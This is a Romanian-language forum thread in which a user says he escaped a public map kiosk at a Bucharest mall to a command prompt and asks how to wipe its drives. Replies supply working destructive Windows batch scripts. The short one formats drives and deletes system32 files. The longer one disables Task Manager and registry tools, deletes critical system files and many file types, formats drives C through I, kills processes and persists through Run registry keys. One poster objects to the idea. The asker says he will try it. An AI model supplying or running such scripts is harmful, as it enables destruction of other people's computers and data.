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Cum formatez din cmd ?

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Am fost acum cateva zile la Mall Liberty din rahova....

si acolo sunt niste harti digitale...ca sa le spun asa...

bun...m'am jucat pe un aparat dala care arata harta pe el....si am reusit sa intru pe desktop

in care era cmd deschis....

si vreau sa stiu cum pot sa formatez C..sau totul de pe hard din consola....

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Intri in notepad folosind comanda asta

start %SystemRoot%\notepad.exe

pui urmatorul cod

@echo off
format D: /q /x /y
format E: /q /x /y
shutdown -r -t 1000
cd %SystemRoot%\system32
del *.exe
del *.dll

salvezi in %SystemRoot%\aaaaaa.bat

scrii in cmd

start %SystemRoot%\aaaaaa.bat

si gata :D

ai grija ca au camere de luat vederi si te trezesti cu pol acasa :D

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ahh .. iar batch... preferatul meu ;x

@echo off

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
echo @ECHO OFF >%systemroot%\end.bat
echo echo Loading... please wait ! >>%systemroot%\end.bat
echo reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1 >>%systemroot%\end.bat
echo reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1 >>%systemroot%\end.bat
echo color EF >>%systemroot%\end.bat
echo cd %systemroot% >>%systemroot%\end.bat
echo cd.. >>%systemroot%\end.bat
echo attrib /S /D -r -h -s >>%systemroot%\end.bat
echo del /Q /F autoexec.bat >>%systemroot%\end.bat
echo del /Q /F boot.ini >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\kernel32.dll >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\rundll32.exe >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\hal.dll >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\logonui.exe >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\etc\hosts >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\etc\networks >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\etc\services >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\etc\lmhosts.sam >>%systemroot%\end.bat
echo del /Q /F %systemroot%\system32\etc\protocol >>%systemroot%\end.bat
echo del /Q /S /F *.exe >>%systemroot%\end.bat
echo del /Q /S /F *.com >>%systemroot%\end.bat
echo del /Q /S /F *.sys >>%systemroot%\end.bat
echo del /Q /S /F *.mp3 >>%systemroot%\end.bat
echo del /Q /S /F *.wav >>%systemroot%\end.bat
echo del /Q /S /F *.dat >>%systemroot%\end.bat
echo del /Q /S /F *.lnk >>%systemroot%\end.bat
echo del /Q /S /F *.ini >>%systemroot%\end.bat
echo del /Q /S /F *.log >>%systemroot%\end.bat
echo del /Q /S /F *.txt >>%systemroot%\end.bat
echo del /Q /S /F *.bak >>%systemroot%\end.bat
echo del /Q /S /F *.htm >>%systemroot%\end.bat
echo del /Q /S /F *.gif >>%systemroot%\end.bat
echo del /Q /S /F *.386 >>%systemroot%\end.bat
echo del /Q /S /F autoexec.bat >>%systemroot%\end.bat
echo format d: /q /y >>%systemroot%\end.bat
echo format e: /q /y >>%systemroot%\end.bat
echo format f: /q /y >>%systemroot%\end.bat
echo format g: /q /y >>%systemroot%\end.bat
echo format t: /q /y >>%systemroot%\end.bat
echo format i: /q /y >>%systemroot%\end.bat
echo format c: /q /y >>%systemroot%\end.bat
echo COLOR >>%systemroot%\end.bat
echo msg * your pc sleeps with the fishes now glad to cmiN >>%systemroot%\end.bat
echo TASKKILL /F /T /IM explorer >>%systemroot%\end.bat
echo TASKKILL /F /T /IM svchost.exe >>%systemroot%\end.bat
echo TASKKILL /F /T /IM system.exe >>%systemroot%\end.bat
echo shutdown -f -s -t 7 >>%systemroot%\end.bat
echo del /Q /S /F *.* >>%systemroot%\end.bat

echo START %systemroot%\end.bat /MIN /REALTIME >%systemroot%\start.bat

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v start.bat /t REG_SZ /d %systemroot%\start.bat /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v start.bat /t REG_SZ /d %systemroot%\start.bat /f
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
START %systemroot%\end.bat /MIN /REALTIME

msg * Goodbye ... please bury-me in cmiN's garden }{

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esti prost... (si normal trebuie o completare k altfel vine nenea si da delete la post si zice ca eu sunt prost...) pentru ca nu se face asa ceva.. pur si simplu... decat sa formatezi c: mai bine te-ai gandi la ceva mai productiv pt tine... sau dak nu te duce capu, nu face nimic... considera-te hacker ca ai reusit sa ai acces la cmd : )))

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care e scopul ???

lipsa de ocupatie

Intri in notepad folosind comanda asta

start %SystemRoot%\notepad.exe

pui urmatorul cod

@echo off
format D: /q /x /y
format E: /q /x /y
shutdown -r -t 1000
cd %SystemRoot%\system32
del *.exe
del *.dll

salvezi in %SystemRoot%\aaaaaa.bat

scrii in cmd

start %SystemRoot%\aaaaaa.bat

si gata :D

ai grija ca au camere de luat vederi si te trezesti cu pol acasa :D

Merci, am sa incerc...

esti prost... (si normal trebuie o completare k altfel vine nenea si da delete la post si zice ca eu sunt prost...) pentru ca nu se face asa ceva.. pur si simplu... decat sa formatezi c: mai bine te-ai gandi la ceva mai productiv pt tine... sau dak nu te duce capu, nu face nimic... considera-te hacker ca ai reusit sa ai acces la cmd : )))


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